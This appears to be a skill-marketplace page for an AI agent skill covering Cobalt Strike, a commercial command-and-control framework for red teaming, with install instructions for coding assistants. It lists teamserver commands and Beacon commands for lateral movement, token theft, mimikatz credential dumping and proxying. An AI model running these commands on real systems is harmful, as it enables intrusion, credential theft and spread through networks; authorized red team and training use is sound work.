aeondave/cobalt-strike
offensive-tools/c2/cobalt-strike/SKILL.md
Cobalt Strike: commercial adversary simulation platform with Beacon implant supporting HTTP/S, DNS, SMB, TCP, and Malleable C2 profiles. Use when operating professional red team engagements, simulating advanced threat groups, managing multi-operator teamserver infrastructure, or executing BOFs.
$ install --global
skillsauthnpx skillsauth add aeondave/malskill cobalt-strikeInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: Mar 31, 2026, 8:57 PM57.1s1 file scanned
SKILL.md
- name:
- cobalt-strike
- description:
- Cobalt Strike: commercial adversary simulation platform with Beacon implant supporting HTTP/S, DNS, SMB, TCP, and Malleable C2 profiles. Use when operating professional red team engagements, simulating advanced threat groups, managing multi-operator teamserver infrastructure, or executing BOFs.
- license:
- Commercial
- compatibility:
- Teamserver: Linux/macOS. Client: Windows/Linux/macOS (Java). Commercial license required.
- author:
- AeonDave
- version:
- 1.0
Cobalt Strike
Commercial adversary simulation with Beacon implant.
Quick Start
./teamserver <ip> <password> [malleable-profile]
./cobaltstrike
Beacon Commands
| Command | Purpose |
|---------|---------|
| shell <cmd> | Run via cmd.exe |
| run <cmd> | Execute directly |
| powerpick <ps> | Unmanaged PowerShell |
| execute-assembly <dll> <args> | In-memory .NET execution |
| inline-execute <bof> | Execute BOF in Beacon |
| jump psexec <target> <listener> | Lateral movement via SMB |
| jump winrm64 <target> <listener> | Lateral via WinRM |
| steal_token <pid> | Token impersonation |
| mimikatz sekurlsa::logonpasswords | Kiwi credential dump |
| socks 1080 | SOCKS proxy |
| rportfwd <lp> <host> <rp> | Reverse port forward |
Malleable C2
Profiles modify Beacon network fingerprint. Key sections: http-get, http-post, stage, process-inject.
./c2lint malleable-profile.profile
Resources
| File | When to load |
|------|--------------|
| references/ | Aggressor Script, BOF development, Malleable profile examples |
Related Skills
aeondave/vibe-audit-technique
development
VerifiedTrustedCommunity
White-box auditing methodology for AI-generated ('vibe-coded') applications. Focuses on modern stack misconfigurations (Supabase, Next.js, Vercel).
4SKILL.mdUpdated Jun 12, 2026
aeondave/source-review-technique
development
VerifiedTrustedCommunity
Hybrid AI/Deterministic SAST methodology for discovering zero-day vulnerabilities in source code. Orchestrates structural search with AI-driven data flow and sink validation.
4SKILL.mdUpdated Jun 12, 2026
aeondave/hardware-technique
development
VerifiedTrustedCommunity
Auth assessment: hardware/embedded methodology; UART/JTAG/SWD/SPI/I2C, firmware extraction, boot/debug paths, embedded OS evidence.
4SKILL.mdUpdated Jun 12, 2026
aeondave/container-technique
devops
VerifiedTrustedCommunity
Container methodology: Identifying containerization limits, Docker/K8s misconfigurations, and executing escapes to the host node.
4SKILL.mdUpdated Jun 12, 2026